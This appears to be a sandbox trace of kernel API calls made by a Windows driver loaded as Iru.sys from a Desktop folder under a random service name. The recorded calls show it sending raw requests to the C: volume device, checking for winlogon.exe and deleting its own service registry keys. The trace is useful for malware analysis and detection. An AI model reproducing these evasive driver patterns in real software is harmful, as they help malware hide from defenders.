| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xaa, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2cba50, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d283b8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa8, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0xa8, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00033d283b8, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| wcsstr | _Str = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, _SubStr = \??\, ret_val_out = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b9ae4310, Tag = 0x0 | ||||
| ZwCreateFile | DesiredAccess_unk = 0x10000000, ObjectAttributes_ptr = 0xffffd00033d28cf0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x0, CreateDisposition = 0x1, CreateOptions = 0x10, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d28fb8, FileHandle_out = 0x0, IoStatusBlock_unk_out = 0xffffd00033d28d50, ret_val_out = 0xc0000043 | ||||
| ZwClose | Handle_unk = 0x0, ret_val_out = 0xc0000008 | ||||
| ZwClose | Handle_unk = 0xffffd00033d28fb0, ret_val_out = 0xc0000008 | ||||
| RtlInitUnicodeString | SourceString = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, DestinationString_out = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys | ||||
| ZwCreateFile | DesiredAccess_unk = 0x100001, ObjectAttributes_ptr = 0xffffd00033d28b40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x3, CreateDisposition = 0x1, CreateOptions = 0x40, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d28fa0, FileHandle_out = 0xffffffff80000fbc, IoStatusBlock_unk_out = 0xffffd00033d28b70, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000fbc, ret_val_out = 0x0 | ||||
| RtlInitUnicodeString | SourceString = \SystemRoot, DestinationString_out = \SystemRoot | ||||
| ZwOpenFile | DesiredAccess_unk = 0x100000, ObjectAttributes_ptr = 0xffffd00033d28f50, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \SystemRoot, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ShareAccess = 0x1, OpenOptions = 0x21, FileHandle_ptr_out = 0xffffd00033d28fa8, FileHandle_out = 0xffffffff80000fbc, IoStatusBlock_unk_out = 0xffffd00033d28f40, ret_val_out = 0x0 | ||||
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000fbc, DesiredAccess_unk = 0x1f01ff, ObjectType_unk = 0xffffe0003a468dc0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00033d28fb0, Object_out = 0xffffe0003b478230, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 | ||||
| IoQueryFileDosDeviceName | FileObject_unk = 0xffffe0003b478230, ObjectNameInformation_unk_out = 0xffffd00033d28fa0, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000fbc, ret_val_out = 0x0 | ||||
| ObfDereferenceObject | Object_ptr = 0xffffe0003b478230, ret_val_ptr_out = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b813b010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \??\C:\Windows\System32\drivers\4UonVc8lOEt4AL4JQLxQ8QpV1vO.sys, _String2 = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, ret_val_out = 2 | ||||
| RtlInitUnicodeString | SourceString = \??\C:, DestinationString_out = \??\C: | ||||
| IoCreateFile | DesiredAccess_unk = 0x80100000, ObjectAttributes_ptr = 0xffffd00033d285f8, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x7, Disposition = 0x1, CreateOptions = 0x20, EaBuffer_ptr = 0x0, EaLength = 0x0, CreateFileType_unk = 0xfffff80000000000, InternalParameters_ptr = 0x0, Options = 0x100, FileHandle_ptr_out = 0xffffd00033d285f0, FileHandle_out = 0xffffffff80000fbc, IoStatusBlock_unk_out = 0xffffd00033d28cd8, ret_val_out = 0x0 | ||||
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000fbc, DesiredAccess_unk = 0x1, ObjectType_unk = 0xffffe0003a468dc0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00033d28628, Object_out = 0xffffe0003b478230, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 | ||||
| ObfDereferenceObject | Object_ptr = 0xffffe0003b478230, ret_val_ptr_out = 0x8000 | ||||
| ZwClose | Handle_unk = 0xffffffff80000fbc, ret_val_out = 0x0 | ||||
| IoAllocateIrp | StackSize = 9, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003b70a010 | ||||
| KeInitializeEvent | Type_unk = 0x1, State = 0, Event_unk_out = 0xffffd00033d28630 | ||||
| ObCreateObject | ObjectAttributesAccessMode_unk = 0x0, ObjectType_unk = 0xffffe0003a468dc0, ObjectAttributes_unk = 0xffffd00033d285f8, AccessMode_unk = 0x0, ParseContext_ptr = 0x0, ObjectSize = 0xd8, PagedPoolCharge = 0x0, NonPagedPoolCharge = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd00033d28c40, Object_out = 0xffffe0003b69cf20, ret_val_out = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x200, ret_val_ptr_out = 0xffffe0003a7858e0 | ||||
| KeInitializeEvent | Type_unk = 0x1, State = 0, Event_unk_out = 0xffffe0003b69cfa0 | ||||
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffe0003b69cfb8 | ||||
| IoGetFileObjectGenericMapping | ret_val_unk_out = 0xfffff80041d24660 | ||||
| SeCreateAccessState | AccessState_unk = 0xffffd00033d28670, AuxData_unk = 0xffffd00033d287e0, Access_unk = 0xc0000000, GenericMapping_unk = 0xfffff80041d24660, ret_val_out = 0x0 | ||||
| IofCallDriver | DeviceObject_unk = 0xffffe0003b878030, Irp_unk = 0xffffe0003b70a010, Irp_unk_out = 0xffffe0003b70a010, ret_val_out = 0x0 | ||||
| KeSetEvent | Event_unk = 0xffffd00033d28630, Increment_unk = 0x0, Wait = 0, Event_unk_out = 0xffffd00033d28630, ret_val_out = 0 | ||||
| IoFreeIrp | Irp_unk = 0xffffe0003b70a010 | ||||
| IoAllocateIrp | StackSize = 9, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003b70a010 | ||||
| KeInitializeEvent | Type_unk = 0x1, State = 0, Event_unk_out = 0xffffd00033d28bf0 | ||||
| IofCallDriver | DeviceObject_unk = 0xffffe0003b878030, Irp_unk = 0xffffe0003b70a010, Irp_unk_out = 0xffffe0003b70a010, ret_val_out = 0x0 | ||||
| KeSetEvent | Event_unk = 0xffffd00033d28bf0, Increment_unk = 0x0, Wait = 0, Event_unk_out = 0xffffd00033d28bf0, ret_val_out = 0 | ||||
| IoFreeIrp | Irp_unk = 0xffffe0003b70a010 | ||||
| IoAllocateIrp | StackSize = 9, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003b70a010 | ||||
| KeInitializeEvent | Type_unk = 0x1, State = 0, Event_unk_out = 0xffffd00033d28bf0 | ||||
| IofCallDriver | DeviceObject_unk = 0xffffe0003b878030, Irp_unk = 0xffffe0003b70a010, Irp_unk_out = 0xffffe0003b70a010, ret_val_out = 0x0 | ||||
| KeSetEvent | Event_unk = 0xffffd00033d28bf0, Increment_unk = 0x0, Wait = 0, Event_unk_out = 0xffffd00033d28bf0, ret_val_out = 0 | ||||
| IoFreeIrp | Irp_unk = 0xffffe0003b70a010 | ||||
| ObfDereferenceObject | Object_ptr = 0xffffe0003b69cf20, ret_val_ptr_out = 0x0 | ||||
| ZwOpenKey | DesiredAccess_unk = 0x10000000, ObjectAttributes_ptr = 0xffffd00033d28f40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb0, KeyHandle_out = 0xffffffff80000fbc, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwQueryKey | KeyHandle_unk = 0xffffffff80000fbc, KeyInformationClass_unk = 0x2, Length = 0x0, KeyInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28fa8, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePoolWithTag | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x2c, Tag = 0x52454753, ret_val_ptr_out = 0xffffc000ba4d29f0 | ||||
| ZwQueryKey | KeyHandle_unk = 0xffffffff80000fbc, KeyInformationClass_unk = 0x2, Length = 0x2c, KeyInformation_ptr_out = 0xffffc000ba4d29f0, ResultLength_ptr_out = 0xffffd00033d28fa8, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwEnumerateKey | KeyHandle_unk = 0xffffffff80000fbc, Index = 0x0, KeyInformationClass_unk = 0x0, Length = 0x0, KeyInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28fa8, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePoolWithTag | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x22, Tag = 0x52454753, ret_val_ptr_out = 0xffffc000ba532670 | ||||
| ZwEnumerateKey | KeyHandle_unk = 0xffffffff80000fbc, Index = 0x0, KeyInformationClass_unk = 0x0, Length = 0x22, KeyInformation_ptr_out = 0xffffc000ba532670, ResultLength_ptr_out = 0xffffd00033d28fa8, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePoolWithTag | PoolType_unk = 0x1, NumberOfBytes_ptr = 0xac, Tag = 0x52454753, ret_val_ptr_out = 0xffffc000ba17ed90 | ||||
| RtlInitUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO\Instances, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO\Instances | ||||
| ZwOpenKey | DesiredAccess_unk = 0x10000000, ObjectAttributes_ptr = 0xffffd00033d28ea0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO\Instances, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d28f10, KeyHandle_out = 0xffffffff80001098, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwQueryKey | KeyHandle_unk = 0xffffffff80001098, KeyInformationClass_unk = 0x2, Length = 0x0, KeyInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28f08, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePoolWithTag | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x2c, Tag = 0x52454753, ret_val_ptr_out = 0xffffc000ba25ec50 | ||||
| ZwQueryKey | KeyHandle_unk = 0xffffffff80001098, KeyInformationClass_unk = 0x2, Length = 0x2c, KeyInformation_ptr_out = 0xffffc000ba25ec50, ResultLength_ptr_out = 0xffffd00033d28f08, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwEnumerateKey | KeyHandle_unk = 0xffffffff80001098, Index = 0x0, KeyInformationClass_unk = 0x0, Length = 0x0, KeyInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28f08, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePoolWithTag | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x58, Tag = 0x52454753, ret_val_ptr_out = 0xffffc000b9ae4310 | ||||
| ZwEnumerateKey | KeyHandle_unk = 0xffffffff80001098, Index = 0x0, KeyInformationClass_unk = 0x0, Length = 0x58, KeyInformation_ptr_out = 0xffffc000b9ae4310, ResultLength_ptr_out = 0xffffd00033d28f08, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePoolWithTag | PoolType_unk = 0x1, NumberOfBytes_ptr = 0xf6, Tag = 0x52454753, ret_val_ptr_out = 0xffffc000b9c8c840 | ||||
| RtlInitUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO\Instances\4UonVc8lOEt4AL4JQLxQ8QpV1vO Instance, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO\Instances\4UonVc8lOEt4AL4JQLxQ8QpV1vO Instance | ||||
| ZwOpenKey | DesiredAccess_unk = 0x10000000, ObjectAttributes_ptr = 0xffffd00033d28e00, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO\Instances\4UonVc8lOEt4AL4JQLxQ8QpV1vO Instance, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d28e70, KeyHandle_out = 0xffffffff80000a88, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwQueryKey | KeyHandle_unk = 0xffffffff80000a88, KeyInformationClass_unk = 0x2, Length = 0x0, KeyInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28e68, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePoolWithTag | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x2c, Tag = 0x52454753, ret_val_ptr_out = 0xffffc000b8696f50 | ||||
| ZwQueryKey | KeyHandle_unk = 0xffffffff80000a88, KeyInformationClass_unk = 0x2, Length = 0x2c, KeyInformation_ptr_out = 0xffffc000b8696f50, ResultLength_ptr_out = 0xffffd00033d28e68, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwDeleteKey | KeyHandle_unk = 0xffffffff80000a88, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b8696f50, Tag = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b9ae4310, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b9c8c840, Tag = 0x0 | ||||
| ZwDeleteKey | KeyHandle_unk = 0xffffffff80001098, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba25ec50, Tag = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80001098, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba532670, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba17ed90, Tag = 0x0 | ||||
| ZwDeleteKey | KeyHandle_unk = 0xffffffff80000fbc, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba4d29f0, Tag = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000fbc, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b8567010 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000ba1495b0 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b8fbc110 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b83dbbe0 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000ba12f220 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b9323ef0 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b8e43d00 | ||||
| ExSystemTimeToLocalTime | SystemTime_ptr = 0xffffd00033d28be8, LocalTime_ptr_out = 0xffffd00033d28bf0 | ||||
| RtlTimeToTimeFields | Time_ptr = 0xffffd00033d28bf0, TimeFields_unk_out = 0xffffd00033d28b90 | ||||
| RtlInitUnicodeString | SourceString = \SystemRoot, DestinationString_out = \SystemRoot | ||||
| ZwOpenFile | DesiredAccess_unk = 0x100000, ObjectAttributes_ptr = 0xffffd00033d28b90, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \SystemRoot, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ShareAccess = 0x1, OpenOptions = 0x21, FileHandle_ptr_out = 0xffffd00033d28be8, FileHandle_out = 0xffffffff80000fbc, IoStatusBlock_unk_out = 0xffffd00033d28b80, ret_val_out = 0x0 | ||||
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000fbc, DesiredAccess_unk = 0x1f01ff, ObjectType_unk = 0xffffe0003a468dc0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00033d28bf0, Object_out = 0xffffe0003b478230, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 | ||||
| IoQueryFileDosDeviceName | FileObject_unk = 0xffffe0003b478230, ObjectNameInformation_unk_out = 0xffffd00033d28be0, ret_val_out = 0x0 | ||||
